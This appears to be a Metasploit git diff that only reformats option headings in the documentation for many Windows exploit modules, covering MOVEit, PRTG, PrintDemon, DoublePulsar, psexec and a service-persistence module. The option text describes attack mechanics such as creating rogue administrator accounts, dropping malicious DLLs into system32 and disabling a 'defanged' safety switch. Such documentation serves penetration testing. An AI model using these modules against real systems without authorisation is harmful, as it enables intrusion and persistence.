-**DLLNAME** +### DLLNAME The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated. -**DRIVE** +### DRIVE Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered. diff --git a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md index aa7b48a355adc..cc480680094a2 100644 --- a/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md +++ b/documentation/modules/exploit/windows/fileformat/documalis_pdf_editor_and_scanner.md @@ -27,7 +27,7 @@ Editor (depending on which software was exploited). ## Options - **FILENAME** +### FILENAME Name of the PDF file that Metasploit will generate. This will default to "msf.pdf", but can be changed. ## Scenarios diff --git a/documentation/modules/exploit/windows/fileformat/office_excel_slk.md b/documentation/modules/exploit/windows/fileformat/office_excel_slk.md index e0a0925a55dd6..ada271f5381d1 100644 --- a/documentation/modules/exploit/windows/fileformat/office_excel_slk.md +++ b/documentation/modules/exploit/windows/fileformat/office_excel_slk.md @@ -19,7 +19,7 @@ on the target. ## Options - **FILENAME** +### FILENAME The name of the generated .slk file. Default is a randomly generated file name. diff --git a/documentation/modules/exploit/windows/fileformat/winrar_ace.md b/documentation/modules/exploit/windows/fileformat/winrar_ace.md index 7f890f6f31bec..9349184f34f2a 100644 --- a/documentation/modules/exploit/windows/fileformat/winrar_ace.md +++ b/documentation/modules/exploit/windows/fileformat/winrar_ace.md @@ -23,13 +23,13 @@ This module will attempt to extract a payload to the startup folder of the curre ## Options -**FILENAME** +### FILENAME Filename to output. Default is `msf.ace`. Other extensions like `rar` and `zip` can be used as WinRAR parses files by their headers and not by extension. -**CUSTFILE** +### CUSTFILE Optional. Custom payload to use. Can be anything. Just be aware that some files are not *meant* to be executed in case you're wondering why the shellz ain't poppin'. -**FILE_LIST** +### FILE_LIST Optional. A list of other files to be included in the resulting ACE archive. The specified file must contain full paths to other files. Compression is NOT taking place. This can be used to make the output file seem more realistic. ## Examples diff --git a/documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md b/documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md index c129987031a55..040bea47c36df 100644 --- a/documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md +++ b/documentation/modules/exploit/windows/fileformat/word_msdtjs_rce.md @@ -33,15 +33,15 @@ Tested on Microsoft Windows 10 1909 with Microsoft Office Word 2016. ## Options -**CUSTOMTEMPLATE** +### CUSTOMTEMPLATE A DOCX file that will be used as a template to build the exploit. -**OBFUSCATE** +### OBFUSCATE Obfuscate JavaScript content. Default: true -**URIPATH** +### URIPATH The URI for the callback to get the payload. Testing suggests this must be ANSI compatible and the full URI must be less than 76 characters. ## Scenarios diff --git a/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md index ba68434a8f954..ef1c2b0b205af 100644 --- a/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md +++ b/documentation/modules/exploit/windows/http/disk_pulse_enterprise_get.md @@ -17,11 +17,11 @@ ## Options - **RHOST** +### RHOST IP address of the remote host running the server. - **RPORT** +### RPORT Port that the web server is running on. Default is 80 but it can be changed when setting up the program or in the options. diff --git a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md index c8b5cc81f4140..f028726d1753e 100644 --- a/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md +++ b/documentation/modules/exploit/windows/http/dnn_cookie_deserialization_rce.md @@ -144,39 +144,39 @@ The expected structure includes a "type" attribute to instruct the server which ## Options - **DryRun** +### DryRun Set this to `true` to generate a payload, but not send the exploit to the target server. Default value is `false`. - **ENCRYPTED** +### ENCRYPTED Set this to `true` for targets running v9.1.1+. Default value is `false`. - **IV** +### IV The initialization vector to use for encrypting the payload. If specified along with `KEY`, `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored. - **KEY** +### KEY The key to use for encryption. If specified along with `IV`, `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored. - **SESSION_TOKEN** +### SESSION_TOKEN The .DOTNETNUKE session cookie value to use when submitting the payload to the server. Required for targets running v9.2.0+. - **SRVPORT** +### SRVPORT The server port to listen for HTTP callbacks on when testing encryption passphrases for targets running v9.2.2 - v9.3.0-RC. Default value is `8080` - **TARGETURI** +### TARGETURI Path to a page that will result in a DNN 404 Error Page. The default location is `/__` - **VERIFICATION_CODE** +### VERIFICATION_CODE The verification code received in an email, or the full path to a file containing multiple verification codes. - **VERIFICATION_PLAIN** +### VERIFICATION_PLAIN The known (full or partial) plaintext of the encrypted verification code. Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer (v9.1.1 - v9.2.1) or GUID (v9.2.2+). diff --git a/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md b/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md index 7e5d435e46a9b..e8fd2f706aff0 100644 --- a/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md +++ b/documentation/modules/exploit/windows/http/ektron_xslt_exec_ws.md @@ -25,13 +25,13 @@ These are important but perhaps less-used options. There are quite a few other 'web' options available which will not be discussed due to their generality. - **TARGETOP** +### TARGETOP There are multiple operations which are vulnerable to this XSLT bug. We have enumerated more (likely all) of the operations in ServerControlWS.asmx and provide testers with the ability to test the additional operations by setting this option to one of the following: ContentBlockEx, GetContentFlaggingString,GetMessagingString, GetBookmarkString, GetContentRatingString This value defaults to ContentBlockEx (from the original reports). Testers may find adjusting this value useful if defenders have included Web Application Firewall (WAF) rules to specifically filter ContentBlockEx as a mitigation in lieu of updating. - **TARGETURI** +### TARGETURI This allows the tester to adjust the base-installation path. The default value is '/cms400min' but in our experience many deployments are simply the root path '/'. diff --git a/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md b/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md index de3349c3eea0a..e8b8d3a62321d 100644 --- a/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md +++ b/documentation/modules/exploit/windows/http/hp_imc_java_deserialize.md @@ -29,15 +29,15 @@ ## Options - **TARGETURI** +### TARGETURI Path to the IMC application, the default location is `/imc`. - **SSL** +### SSL As set up by default, IMC is vulnerable both over port `8080` and `8443` (SSL). Set this parameter to `true` and change `RPORT` if you'd like to exploit over SSL. - **RPORT** +### RPORT Set this to the appropriate port, `8080` (default) or `8443`. diff --git a/documentation/modules/exploit/windows/http/moveit_cve_2023_34362.md b/documentation/modules/exploit/windows/http/moveit_cve_2023_34362.md index 1959526401b48..da008fecb8d75 100644 --- a/documentation/modules/exploit/windows/http/moveit_cve_2023_34362.md +++ b/documentation/modules/exploit/windows/http/moveit_cve_2023_34362.md @@ -24,11 +24,17 @@ https://www.ipswitch.com/forms/free-trials/moveit-transfer 4. After the installation completes, follow the instructions to create an admin user. ## Options -**LOGIN_NAME** (Required) Will be used as the login name for the system administrator created by the exploit. The default is random. +### LOGIN_NAME -**PASSWORD** (Required) Will be used as the password name for the system administrator created by the exploit. The default is random. +(Required) Will be used as the login name for the system administrator created by the exploit. The default is random. -**USERNAME** (Required) Will be used as the user name for the system administrator created by the exploit. The default is random. +### PASSWORD + +(Required) Will be used as the password name for the system administrator created by the exploit. The default is random. + +### USERNAME + +(Required) Will be used as the user name for the system administrator created by the exploit. The default is random. ## Verification Steps * Do: `msfconsole` diff --git a/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md b/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md index 57c286086495c..2af08bf4b37b2 100644 --- a/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md +++ b/documentation/modules/exploit/windows/http/octopusdeploy_deploy.md @@ -19,27 +19,27 @@ ## Options - **APIKEY** +### APIKEY API key, which can be generated within the Octopus Deploy application. Can be used instead of a username/password combination. - **USERNAME** +### USERNAME Username of the Octopus Deploy user. - **PASSWORD** +### PASSWORD Password of the Octopus Deploy user. - **PATH** +### PATH Path to the Octopus Deploy instance. For example, if you sign in to "https://example.com/octopus/app", the value should be "/octopus". - **STEPNAME** +### STEPNAME Name of the step to be added to a deployment. This may be visible in the application for a short period of time. A random value will be generated if no value is provided. - **SSL** +### SSL Enables or disables SSL. Octopus Deploy server can be configured to listen for HTTP or HTTPS traffic. diff --git a/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md b/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md index 7a6aa5de1aa12..f70661651f8f5 100644 --- a/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md +++ b/documentation/modules/exploit/windows/http/prtg_authenticated_rce.md @@ -42,15 +42,15 @@ PRTG Network Monitor is also available on the "Netmon" lab from Hack The Box, it In my experience steps 10-12 may require a few tries to work because notifications are queued up before execution on the server. Augmenting `WfsDelay` to 30 seconds did the trick, so it is set by default. ## Options -**ADMIN_USERNAME** +### ADMIN_USERNAME PRTG Network Monitor's account that has the right to create Notifications (allowed by default on the initial account). -**ADMIN_PASSWORD** +### ADMIN_PASSWORD The password associated with the specified username. -**VERBOSE** +### VERBOSE Setting `VERBOSE` to `true` displays the raw Powershell payload in console for manual testing. diff --git a/documentation/modules/exploit/windows/http/prtg_authenticated_rce_cve_2023_32781.md b/documentation/modules/exploit/windows/http/prtg_authenticated_rce_cve_2023_32781.md index 9afb99a7e1981..ecebf16c97b06 100644 --- a/documentation/modules/exploit/windows/http/prtg_authenticated_rce_cve_2023_32781.md +++ b/documentation/modules/exploit/windows/http/prtg_authenticated_rce_cve_2023_32781.md @@ -50,11 +50,11 @@ After running this you should have a meterpreter instance ## Options -**USERNAME** +### USERNAME PRTG Network Monitor's account that has the right to create Sensors (allowed by default on the initial account). -**PASSWORD** +### PASSWORD The password associated with the specified username. diff --git a/documentation/modules/exploit/windows/http/smartermail_rce.md b/documentation/modules/exploit/windows/http/smartermail_rce.md index 637b19dfac281..a9fb7d82884a5 100644 --- a/documentation/modules/exploit/windows/http/smartermail_rce.md +++ b/documentation/modules/exploit/windows/http/smartermail_rce.md @@ -56,10 +56,10 @@ Set Admin username and password to be `admin:admin` (or anything arbitrary) if p ### TARGET (Required) - 0. Target 0 (default) - Windows Command uses a default PowerShell payload to execute - code and open a Meterpreter session. However, any desired payload can be chosen. Choose with `set TARGET 0`. - 1. Target 1 - x86/x64 Windows CmdStager uses a CmdStager with default `vbs` stager flavor to execute code - and open a Meterpreter session. Choose with `set TARGET 1`. +0. Target 0 (default) - Windows Command uses a default PowerShell payload to execute +code and open a Meterpreter session. However, any desired payload can be chosen. Choose with `set TARGET 0`. +1. Target 1 - x86/x64 Windows CmdStager uses a CmdStager with default `vbs` stager flavor to execute code +and open a Meterpreter session. Choose with `set TARGET 1`. ### ENDPOINT (Required) diff --git a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md index 5801b0ced4ce1..81acf408d45fd 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md @@ -83,21 +83,21 @@ The attack looks something like: ## Options - **EXPLOIT_DIR** +### EXPLOIT_DIR Directory to use for file upload and linking; this should not already exist. The directory cannot be deleted until after a reboot. - **OVERWRITE_DLL** +### OVERWRITE_DLL Overwrite WindowsCreDeviceInfo.dll if it exists (false by default). WindowsCoreDeviceInfo.dll is not present by default, but if it is present, it is likely loaded, so even with this set to true, the overwrite (and exploit) will fail. - **PAYLOAD_UPLOAD_NAME** +### PAYLOAD_UPLOAD_NAME The filename to use for the payload binary (%RAND% by default). This is the name of the dll payload when uploaded to the remote host. - **PHONEBOOK_UPLOAD_NAME** +### PHONEBOOK_UPLOAD_NAME The name of the phonebook file to trigger RASDIAL (%RAND% by default). The rasdialer trigger requires a config file; this is the name of the xml file required to trigger the RAST service. diff --git a/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md b/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md index 51631ddbaa960..db53be0e222c9 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md +++ b/documentation/modules/exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move.md @@ -35,13 +35,13 @@ vulnerability. 7. You should get a shell running as SYSTEM a few seconds after the `JOB_WAIT_TIME` timer expires. ## Options - **OVERWRITE_DLL** +### OVERWRITE_DLL Overwrite WindowsCreDeviceInfo.dll if it exists (false by default). WindowsCoreDeviceInfo.dll is not present by default, but if it is present, it is likely loaded, so even with this set to true, the overwrite (and exploit) will likely end up failing. - **JOB_WAIT_TIME** +### JOB_WAIT_TIME Amount of time, in seconds, to wait for CVE-2020-0787.x64.dll or CVE-2020-0787.x86.dll to finish running before attempting to load uso_trigger.x86.dll or uso_trigger.x64.dll to conduct the local privilege elevation. The main reason for configuring this option is diff --git a/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md index 85f40114c7055..0274581d5b3c4 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1048_printerdemon.md @@ -40,31 +40,31 @@ to work. ## Options - **EXECUTE_DELAY** +### EXECUTE_DELAY The time between uploading and running the exploit. Default is 3 seconds, but high-latency networks may require more time. - **EXPLOIT_NAME** +### EXPLOIT_NAME The name of the when it is uploaded to the target (%RAND% by default). - **EXPLOIT_DIR** +### EXPLOIT_DIR Directory to use for file upload and linking; this should not already exist. (%RAND% by default) - **OVERWRITE_DLL** +### OVERWRITE_DLL The remote location you would like to write to. Default is ```C:\windows\system32\ualapi.dll``` - **PAYLOAD_NAME** +### PAYLOAD_NAME The filename to use for the payload binary (%RAND% by default). This is the name of the dll payload when uploaded to the remote host. - **RESTART_TARGET** +### RESTART_TARGET This will restart the target to force the overwrite. YOU WILL LOSE YOUR SESSION unless you have a method of persistence. The dll will not be run until a second reboot. - **WRITEABLE_DIR** +### WRITEABLE_DIR The directory to use the payload binary and uploaded payload. (%RAND% by default). diff --git a/documentation/modules/exploit/windows/local/cve_2020_1313_system_orchestrator.md b/documentation/modules/exploit/windows/local/cve_2020_1313_system_orchestrator.md index 911f517071b7a..9ff40913c9ec4 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1313_system_orchestrator.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1313_system_orchestrator.md @@ -33,20 +33,20 @@ Where `x` is a numeric key assigned to the job. ## Options - **EXECUTE_DELAY** +### EXECUTE_DELAY The number of seconds to sleep after uploading the exploit and launching it. - **EXPLOIT_NAME** +### EXPLOIT_NAME The name of the exploit EXE as it will appear on target - **EXPLOIT_TIMEOUT** +### EXPLOIT_TIMEOUT The maximum time to wait for a response from the exploit binary. - **PAYLOAD_NAME** +### PAYLOAD_NAME The name of the payload EXE as it will appear on target - **WRITABLE_DIR** +### WRITABLE_DIR Directory to use for file upload and linking; this should not already exist. This directory will require manual cleanup. diff --git a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md index beea8dd3c64d2..2d65af6cfa962 100644 --- a/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md +++ b/documentation/modules/exploit/windows/local/cve_2020_1337_printerdemon.md @@ -51,27 +51,27 @@ Verify you get a session ## Options - **DESTINATION_FILE** +### DESTINATION_FILE The remote file you would like to write to. Default is ```ualapi.dll``` - **DESTINATION_PATH** +### DESTINATION_PATH The remote location of the file you would like to write to. Default is ```C:\windows\system32\``` - **JUNCTION_PATH** +### JUNCTION_PATH Path to use as a juntion point. It should be nonexistent/empty. Default is ```%TEMP%/%RAND%``` - **PRINTER_NAME** +### PRINTER_NAME The printer name to use. Default is %RAND%. - **RESTART_TARGET** +### RESTART_TARGET This will restart the target to force the overwrite. YOU WILL LOSE YOUR SESSION unless you have a method of persistence. The dll will not be run until a second reboot. - **SESSION** +### SESSION The session to target ## Scenarios diff --git a/documentation/modules/exploit/windows/local/panda_psevents.md b/documentation/modules/exploit/windows/local/panda_psevents.md index eb84dd92153af..ce23080763686 100644 --- a/documentation/modules/exploit/windows/local/panda_psevents.md +++ b/documentation/modules/exploit/windows/local/panda_psevents.md @@ -25,7 +25,7 @@ ## Options - **DLL** +### DLL Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details. @@ -39,7 +39,7 @@ In this chart, `CRASH` means PSEvents.exe crashed on the system. `NO` means PSEvents didn't crash, but no session was obtained. `valid` means we got a shell. - **ListenerTimeout** +### ListenerTimeout How long to wait for a shell. PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things) diff --git a/documentation/modules/exploit/windows/local/persistence_service.md b/documentation/modules/exploit/windows/local/persistence_service.md index 03132b662a9f2..26c4b4e0a1a30 100644 --- a/documentation/modules/exploit/windows/local/persistence_service.md +++ b/documentation/modules/exploit/windows/local/persistence_service.md @@ -5,23 +5,23 @@ It will create a new service which will start the payload whenever the service i ## Options - **REMOTE_EXE_NAME** +### REMOTE_EXE_NAME The remote victim name. Random string as default. - **REMOTE_EXE_PATH** +### REMOTE_EXE_PATH The remote victim exe path to run. Use temp directory as default. - **RETRY_TIME** +### RETRY_TIME The retry time that shell connect failed. 5 seconds as default. - **SERVICE_DESCRIPTION** +### SERVICE_DESCRIPTION The description of service. Random string as default. - **SERVICE_NAME** +### SERVICE_NAME The name of service. Random string as default. diff --git a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md index 72ba06b84a09a..ac297cc2b0245 100644 --- a/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md +++ b/documentation/modules/exploit/windows/local/plantronics_hub_spokesupdateservice_privesc.md @@ -24,11 +24,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `%TEMP%`) diff --git a/documentation/modules/exploit/windows/local/tokenmagic.md b/documentation/modules/exploit/windows/local/tokenmagic.md index 0eaf68bc6de11..ff329b6157557 100644 --- a/documentation/modules/exploit/windows/local/tokenmagic.md +++ b/documentation/modules/exploit/windows/local/tokenmagic.md @@ -27,21 +27,21 @@ the powershell script manually after some edits to accomplish access to a Window 7. You should get a shell, the exploitation process should be fairly instantaneous ## Options - **METHOD** +### METHOD Select between DLL hijacking and service exploitation * DLL mode: Using the elevated privileges from token magic the module will write a malicious file to `c:\windows\system32\windowscoredeviceinfo.dll`, a temporary host process is spawned and a DLL trigger is injected into the process to call the `usoclient`. When the `usoclient` EXE runs it loads the malicious DLL `windowscoredeviceinfo.dll` with `SYSTEM` level privileges. * SERVICE mode: Using the elevated privileges from token magic the module, create a malicious service, and then start it with `SYSTEM` level privileges - **SERVICE_FILENAME** +### SERVICE_FILENAME Filename for Service Payload (Random by default). - **SERVICE_NAME** +### SERVICE_NAME Service Name to use (Random by default). - **SESSION** +### SESSION The session to run this module on. - **WRITABLE_DIR** +### WRITABLE_DIR Directory to write file to (`%TEMP%` by default). ## Scenarios diff --git a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md index 3bf7fa57746df..e0009554322d6 100644 --- a/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md +++ b/documentation/modules/exploit/windows/local/windscribe_windscribeservice_priv_esc.md @@ -33,11 +33,11 @@ ## Options - **SESSION** +### SESSION Which session to use, which can be viewed with `sessions` - **WritableDir** +### WritableDir A writable directory file system path. (default: `%TEMP%`) diff --git a/documentation/modules/exploit/windows/misc/gh0st.md b/documentation/modules/exploit/windows/misc/gh0st.md index a86b89736d30f..d424cac8ee430 100644 --- a/documentation/modules/exploit/windows/misc/gh0st.md +++ b/documentation/modules/exploit/windows/misc/gh0st.md @@ -16,7 +16,7 @@ ## Options - **MAGIC** +### MAGIC This is the 5 character magic used by the server. The default is `Gh0st` diff --git a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md index 805b37bf14412..bee58dcfacad3 100644 --- a/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md +++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md @@ -17,12 +17,12 @@ Id Name ## Options -**DefangedMode** +### DefangedMode Set this to `false` to disable defanged mode and enable module functionality. Set this only if you're SURE you want to proceed. -**ProcessName** +### ProcessName Set this to the userland process you want to inject the payload into. Defaults to `spoolsv.exe`. diff --git a/documentation/modules/exploit/windows/smb/group_policy_startup.md b/documentation/modules/exploit/windows/smb/group_policy_startup.md index 0e55ab010ce55..69a41ca56a469 100644 --- a/documentation/modules/exploit/windows/smb/group_policy_startup.md +++ b/documentation/modules/exploit/windows/smb/group_policy_startup.md @@ -17,15 +17,15 @@ More information available at [Gotham Digital Science Security](https://blog.gds ## Options - **FILE_NAME** +### FILE_NAME VBS File name to share (Default: random .vbs) - **FOLDER_NAME** +### FOLDER_NAME Folder name to share (Default: none) - **SHARE** +### SHARE Share name (Default: Random) diff --git a/documentation/modules/exploit/windows/smb/ms17_010_psexec.md b/documentation/modules/exploit/windows/smb/ms17_010_psexec.md index ac661c826fbc7..259d4152a78e6 100644 --- a/documentation/modules/exploit/windows/smb/ms17_010_psexec.md +++ b/documentation/modules/exploit/windows/smb/ms17_010_psexec.md @@ -39,23 +39,23 @@ msf exploit(psexec) > exploit By default, using exploit/windows/smb/ms17_010_psexec can be as simple as setting the RHOST option, and you're ready to go. -**The NAMEDPIPE Option** +### NAMEDPIPE By default, the module will scan for a list of common pipes for any available one. You can specify one by name. -**The LEAKATTEMPTS Option** +### LEAKATTEMPTS Information leaks are used to ensure stability of the exploit. Sometimes they don't pop on the first try. -**The DBGTRACE Option** +### DBGTRACE Used to debug, gives extremely verbose information. -**The SMBUser Option** +### SMBUser This is a valid Windows username. -**The SMBPass option** +### SMBPass This can be either the plain text version or the Windows hash. diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index 8516d4799532b..284d44a05a625 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -53,11 +53,11 @@ meterpreter > By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will probably need to at least configure: -**The SMBUser Option** +### SMBUser This is a valid Windows username. -**The SMBPass option** +### SMBPass This can be either the plain text version or the Windows hash. diff --git a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md index a2224899bf602..37b23c030f186 100644 --- a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md +++ b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md @@ -17,12 +17,12 @@ Id Name ## Options -**DefangedMode** +### DefangedMode Set this to `false` to disable defanged mode and enable module functionality. Set this only if you're SURE you want to proceed. -**ProcessName** +### ProcessName Set this to the userland process you want to inject the payload into. Defaults to `spoolsv.exe`.